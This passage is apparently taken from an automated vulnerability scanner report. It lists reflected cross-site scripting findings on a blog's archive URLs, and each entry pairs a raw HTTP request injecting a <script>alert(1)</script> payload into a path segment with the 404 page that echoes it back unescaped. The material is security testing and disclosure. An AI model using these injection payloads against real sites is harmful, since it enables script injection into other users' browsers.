Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
